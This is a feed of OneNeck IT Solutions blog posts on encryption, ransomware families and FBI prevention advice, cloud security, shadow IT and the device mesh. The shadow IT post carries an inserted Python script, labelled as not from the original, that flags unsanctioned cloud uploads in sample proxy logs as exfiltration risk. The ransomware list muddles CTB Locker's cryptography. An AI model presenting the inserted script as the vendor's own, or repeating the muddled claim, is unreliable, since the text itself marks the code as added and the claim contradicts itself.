Trust is especially important when discussing data security. At OneNeck IT Solutions, we understand that data is the lifeblood of your organization and protecting it is paramount. Leveraging data-at-rest encryption technology and ReliaCloud®, our enterprise-class hosted private cloud solution, OneNeck encrypts our customers’ data at rest by default, with no additional action required from you and no impact on the performance you expect to achieve on our cloud platform.

If you’re serious about keeping your at-rest data secure in the cloud, then give us a call today.

How Safe Are You from Rising Ransomware Threats? https://www.oneneck.com/blog/security/how-safe-are-you-from-rising-ransomware-threats/ Thu, 23 Mar 2017 17:00:00 +0000

From hospitals and government agencies, to enterprise organizations and everyday business owners, to private citizens, it seemed like no one was immune from ransomware in 2016. As we are now well into 2017, we’re continuing to see alarming rates of ransomware attacks that encrypt data or lock digital files until a ransom is paid.

Ransomware isn’t new, as the concept has existed for over 20 years, but it is increasing in frequency and sophistication. According to the FBI, law enforcement has seen a large increase in ransomware since 2015, with a larger focus on enterprise organizations that can be extorted for greater ransom. The trend also shows that even when organizations pay, they may not fully recover their data.

The loss of access to critical data leaves its victims with two choices: either fork over the ransom or face massive disruption. These attacks are so successful because most organizations choose to pay. Even those who employ continuous backups and choose not to pay will take a hit to their reputation, lose data and face business continuity upset while they restore their systems.

The Face of Ransomware

Ransomware is a prolific form of malware, and it’s becoming more sophisticated. The days of a simple spam campaign through email are gone and spear phishing, malvertising and social engineering are fooling end users. We now have more notorious ransomware families to worry about:

  • Reveton: Reveton has been spreading since 2012. Masquerading as a law enforcement warning about illegal online activities, cybercriminals use scare tactics to extort funds.
  • CryptoLocker: Spread through the Gameover ZeuS botnet, CryptoLocker has wreaked havoc, infecting around 150,000 computers a month at its peak. With this ransomware, the malware itself is easily removed, but important files remain scrambled with virtually unbreakable encryption.
  • CryptoWall: This variant proves our claim that threats are becoming more sophisticated. Similar to CryptoLocker, CryptoWall is disseminated through multiple infection vectors, including browser exploit kits, malicious email attachments and drive-by downloads.
  • CTB Locker: Using persistent elliptic curve cryptography, CTB Locker encodes files with a unique RSA key.
  • TorrentLocker: This file-encrypting ransomware relies almost entirely on spam email for its distribution. Unlike typical spam campaigns, the cybercriminals behind this attack focus on grammar to appear authentic. Once inside, the campaign harvests email addresses to further distribute the ransomware.
  • TeslaCrypt: This ransomware first exploited the famously vulnerable Adobe Flash to target online gamers, then moved on to larger targets, including several high-profile European companies.
  • Locky: As the newest ransomware on the list, Locky has created a lot of noise recently. Demanding payment in bitcoin, it recently extorted a hospital in Hollywood for around $17,000.

Don’t Fall Victim to Ransomware Attacks

To protect you and your business continuity, the FBI suggests the following:

Focus on Prevention

  • Educate employees on ransomware types and tactics.
  • Reduce vulnerabilities through timely patching and software updates.
  • Set up automatic updates and regular scans of antivirus and anti-malware solutions.
  • Employ least privileges and keep admin access to the bare minimum.
  • Configure access controls, including file, directory and network share permissions. Read Only access should be the standard, with Write privilege granted sparingly.
  • Disable macro scripts for office files transmitted over email.
  • Implement policies that restrict programs from executing in common ransomware locations.

Steps for Business Continuity

  • Continuously backup files and be sure to frequently check the integrity of backups.
  • Secure backups by ensuring they aren’t connected to the computer and networks they are replicating.

When the FBI gets involved, you know that it’s a big threat to security. Ransomware is gaining attention and rightfully so. With the predicted growth, you don’t want to be caught off guard without the right plan and security policies.

According to FBI Cyber Division Assistant Director James Trainor, “There’s no one method or tool that will completely protect you or your organization from a ransomware attack. But contingency and remediation planning are crucial to business recovery and continuity—and these plans should be tested regularly.”

Not sure where to start securing your organization? We’re here to help. Contact us to discuss the risks with one of our security experts. They can guide you in assessing your risks and creating a plan to stay ahead of them, before it’s too late.

Cloud – The Security Game Changer https://www.oneneck.com/blog/cloud/cloud-the-security-game-changer/ Thu, 12 Jan 2017 18:00:00 +0000

As organizations push their workloads into the cloud, IT is losing control over the security of their infrastructures. With the Internet of Things (IoT) and mobile applications thrown into the mix, more data resides off-premises, leaving IT in a big dilemma as to how to best protect company data. This means that IT needs to adapt their security approach to ensure that enterprise data is safe and secure, regardless of where it resides.

Challenging the Legacy Model of Security

According to the recent PwC Global State of Information Security Survey 2017, 63 percent of organizations run IT functions in the cloud. With more cloud-based services and applications that sit outside of the firewall, combined with an increasingly mobile workforce who expects anytime, anywhere access to data, we can no longer distinguish what is “inside” vs. what is “outside” the perimeter. The methodology of using a perimeter-based security approach is no longer effective for enterprise security.

Cyberattacks were identified by 29 percent of organizations surveyed who reported having lost data in the last year. Not only is it more difficult to define the perimeter, it is even more difficult to defend it. Malicious insiders, advanced persistent threats, malware containing malicious links, over-privileged users and the increased threat from ransomware and DDoS attacks have escalated the need for improved cybersecurity measures.

To be effective, IT needs to look beyond physical walls to extend to the cloud and examine the endpoints that are now a big part of the equation.

The Danger of Cybersecurity Complacency

According to Dell EMC’s Global Protection Index 2016, nearly half (47 percent) of IT decision-makers who responded to the survey felt that not all the data their organization stores in the cloud was protected. The survey further finds that more than 80 percent rely on SaaS-based business applications, and that on average 29 percent of their organization’s IT environment is in the public cloud.

Three factors likely contribute to that uncertainty:

  • With the shift to the cloud, many organizations don’t know exactly where their data resides.
  • IT teams need to play a more active role in ensuring the security of corporate data in the cloud.
  • Shadow IT has created vulnerabilities resulting from a lack of access control.

Protecting Enterprise Data

The first step to determining your organization’s risk is to take a full inventory of what cloud services employees are using and how they are using those services. Once you gain visibility into your cloud landscape, it’s time to ensure you have optimal controls in place:

  • Automation: When a workload is launched, it needs to be automatically protected, just as it would be if the workload resided on the perimeter.
  • Personalization: While universal policies should be applied, each workload type should have its own additional policies, based on factors such as the sensitivity of data and regulatory context.
  • Pre-built: The controls should be pre-built into a template so that the developer doesn’t need to continuously investigate which security protocols apply to the new workloads.

Choosing a Cloud Provider

Your cloud provider must be a true partner. It’s important to ensure the service-level agreement (SLA) protects your organization while outlining the duties and responsibilities of each party. Protections you should expect from a cloud provider include measures such as:

  • Data center physical security, employee screening and training
  • Protocols for regular patching, software updates and system upgrades
  • A security model that assigns network permissions and authenticates and authorizes users before they can access resources
  • A data map that shows where data resides to properly protect sensitive data
  • A defense-in-depth model, equivalent to the on-premises one, applied in the cloud

With a cloud provider as a true partner, organizations can then focus on the concerns that remain theirs under any shared-responsibility model: user management, including authentication protocols, and workload separation based on data sensitivity. The provider's protections cover the platform; the customer's data, identities and configuration are still the customer's to secure.

The cloud is indeed a game-changer for today’s enterprises. While security continues to be a concern, with a properly executed and comprehensive strategy, cloud adoption can become an enabler rather than a burden. Not sure where to start? Contact us today for a complimentary cloud readiness assessment to help you gain control over your cloud and keep your data safe.

Are Shadow IT Risks Greater with Hybrid Cloud? https://www.oneneck.com/blog/cloud/shadow-it-risks-greater-with-hybrid-cloud/ Thu, 05 Jan 2017 18:00:00 +0000

The use and adoption of cloud computing are on the rise as more and more companies come to understand the massive advantages of doing business in the cloud. Particularly popular are hybrid cloud solutions that allow users to reap the benefits of both on-premises and cloud technologies at the same time. However, this cloud computing boom has also created new worries for companies in the form of Shadow IT.

The very term “Shadow IT” seems to suggest something terrifying and mysterious, lurking and waiting until one day it destroys your business. While the reality isn’t quite that dramatic, shadow IT still represents a significant concern and challenge for companies who seek to use cloud services. So, what is it, and how can you best address it at your organization?

What Is Shadow IT?

“Shadow IT” refers to the tools, technologies and devices used at a company without the explicit permission or knowledge of the IT department. In an era when many employees are allowed to “bring your own device” (BYOD) to work, and when results-driven startups encourage workers to use any means necessary to solve a problem, Shadow IT has become an all-too-common workaround for the frustrations of officially sanctioned IT tools.

Although Shadow IT has always been a problem for companies whose own employees leave them in the dark, the risk is heightened by the recent popularity of hybrid cloud. Many companies choose a hybrid solution precisely because compliance and security policies require sensitive data to stay on premises. Shadow IT breaks the assumption that this information stays in a controlled environment and increases the chance of a data leak, whether intentional or unintentional.

How Can You Deal with Shadow IT?

Shadow IT presents new challenges for your company, but there are methods and strategies to combat it.

  • First, realize that the presence of shadow IT is like an iceberg, a problem on the surface that hides a larger concern beneath. Find out why your employees felt it necessary to bypass the IT department in the first place and come up with solutions to these underlying issues. Was it the slowness and bureaucracy in your company? Are your employees’ current tools and devices insufficient for their jobs?
  • Second, monitor your network for new and unknown devices and destinations that hint at Shadow IT. Often this can be done with the security tooling you already have, including firewalls, proxies, and security information and event management (SIEM) software. Their logs can tell you which cloud services are being used at your company, who uses them, and how much data is being uploaded to and downloaded from each one.
  • Third, be willing to be flexible. Although there are certain situations where Shadow IT presents an unacceptable risk to your company’s sensitive data, other instances of Shadow IT are simply employees trying to stay ahead of the technological curve. If you discover shadow IT in your midst, you might wish to permit it in the short term depending on the circumstances. This lets your business continue as normal and lets you explore adding these verboten tools to your company’s officially approved toolbox. In addition, if your employees are trying to make their files available outside of work, consider building a mobile-accessible solution that allows them to work remotely while keeping your data secure.
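As an added example (not code from the original post), the following Python script does the kind of analysis the second bullet above describes: it parses web-proxy log lines, groups them by service, and reports the unsanctioned services together with the users involved and the volume moved in each direction, flagging large uploads first because those are the ones that matter for data leakage. The log field layout, the sanctioned-service list, the upload threshold and the log lines themselves are constructed for the example; real proxy or SIEM exports have their own formats and the regular expression would be adapted to them.

```python
"""Added example for this article: find unsanctioned cloud services in web-proxy
logs, with who uses them and how much data moves each way. The log format, the
sanctioned-service list and the threshold are assumptions; the log lines are
constructed samples, not real traffic."""
import re
from collections import defaultdict
from typing import Dict, List

# Assumed proxy log layout: timestamp, user, method, host, bytes sent by the
# client (uploads), bytes received by the client (downloads).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<host>[\w.-]+) "
    r"(?P<bytes_out>\d+) (?P<bytes_in>\d+)$"
)

# Services IT has approved, keyed by registrable domain (assumed for the example).
SANCTIONED = {"office365.com", "salesforce.com", "github.com"}

# Constructed sample traffic (not from a real proxy); the last line is deliberately malformed.
SAMPLE_LOG = """\
2017-01-05T09:02:11Z alice CONNECT outlook.office365.com 1840 42310
2017-01-05T09:05:40Z bob POST api.dropbox.com 52428800 912
2017-01-05T09:07:02Z alice GET api.github.com 600 98000
2017-01-05T09:12:55Z carol POST files.wetransfer.com 734003200 1200
2017-01-05T09:15:13Z bob POST api.dropbox.com 31457280 880
2017-01-05T09:20:30Z dave GET cdn.wetransfer.com 300 22000
2017-01-05T09:22:01Z mallory POST pastebin.com 4096 2000
this line is corrupt and should be skipped
"""


def registrable_domain(host: str) -> str:
    """Simplification: treat the last two labels as the service (no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def summarize(log_text: str) -> Dict[str, dict]:
    """Per service: distinct users, bytes uploaded, bytes downloaded, request count."""
    summary = defaultdict(lambda: {"users": set(), "bytes_out": 0, "bytes_in": 0, "requests": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed lines are skipped here; a production parser would count them
        svc = summary[registrable_domain(m["host"])]
        svc["users"].add(m["user"])
        svc["bytes_out"] += int(m["bytes_out"])
        svc["bytes_in"] += int(m["bytes_in"])
        svc["requests"] += 1
    return dict(summary)


def shadow_it_findings(log_text: str, upload_threshold: int = 10 * 1024 * 1024) -> List[dict]:
    """Unsanctioned services, largest upload volume first; exfil_risk marks uploads over the threshold."""
    findings = []
    for domain, stats in summarize(log_text).items():
        if domain in SANCTIONED:
            continue
        findings.append({
            "service": domain,
            "users": sorted(stats["users"]),
            "mb_uploaded": round(stats["bytes_out"] / 1024 / 1024, 1),
            "mb_downloaded": round(stats["bytes_in"] / 1024 / 1024, 1),
            "exfil_risk": stats["bytes_out"] >= upload_threshold,
        })
    findings.sort(key=lambda f: f["mb_uploaded"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in shadow_it_findings(SAMPLE_LOG):
        flag = " [EXFIL RISK]" if f["exfil_risk"] else ""
        print(f"{f['service']}: {', '.join(f['users'])}; "
              f"{f['mb_uploaded']} MB up / {f['mb_downloaded']} MB down{flag}")
```

Grouping by registrable domain is a deliberate simplification: a real deployment would map hosts to named services (and would not lump every `google.com` subdomain together), but the shape of the report, which service, which users, how much went out, is what the follow-up conversation with those users needs.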

Final Thoughts

Shadow IT, or any other potential complications of cloud computing, shouldn’t make you run screaming from hybrid cloud. Embrace the many benefits that cloud services can bring your company, but be mindful of shadow IT and the need for proper governance. If you’re not sure how to start addressing the problem of Shadow IT at your organization, try a Cloud Consumption Assessment.

Tackling the Device Mesh | Custom IT Solutions https://www.oneneck.com/blog/tackling-the-device-mesh/ Thu, 06 Oct 2016 17:00:00 +0000

The next major technology trend is emerging: the device mesh, which is said to merge the physical and virtual worlds. Thanks to the Internet of Things (IoT), more and more devices are connecting. Worldwide, there are now a total of 1.2 billion LTE subscriptions, and that number is constantly increasing. By 2021, an estimated 28 billion devices will be connected to the Internet.

So, what is the device mesh? The device mesh is an expanding set of endpoints—mobile, wearable, consumer, home electronics, automotive and environmental devices, including sensors in the IoT—that people and businesses will use to reach applications and information or interact with others. Previously our sensors merely reported the collected data back to a single database. But now, apps are starting to talk with each other directly, and the endpoints we use to access our information and applications are starting to work in tandem with one another. This means that we are moving towards a huge network landscape that Gartner identified as one of the Top 10 Strategic Technology Trends for 2016.

Before IoT, apps were downloaded to smartphones or tablets, and a person would open an app whenever they wanted to use it, meaning the app operated on command only. In the new device mesh environment, as soon as you turn on a phone or device, an app starts working quietly in the background, using data fed in from a number of other applications. One need only look at the hype surrounding Pokémon Go to see an example of the device mesh in action.

Some have dubbed the new era as “post-app” or “post-mobile.” However, it may be more accurate to suggest that we are entering an era in which apps and mobile devices are so interactive that their operations will permeate every aspect of everyday life. For everyday users, the practical effects of device mesh are that their experiences of technology will become even more personalized.

As app integration becomes the norm, users will no longer need to concern themselves with app compatibility. Apps will work together invisibly, operating as users require. With an ambient user experience, users will actually spend less time finagling with individual apps. Instead, mobile devices can act as true personal assistants, working in the background to fulfill needs and provide services.

The potential of this technology offers numerous applications for businesses. In this new environment, companies will be able to provide personalized experiences to customers and employees. However, there are undoubtedly legal and privacy concerns that will need to be approached carefully.

Device mesh is coming—indeed, in some ways, it is already here. To navigate these new waters, companies need a trusted partner to help them understand the risks and make the right choices for their organization. Not sure where to start? Talk to one of our mobility experts today.
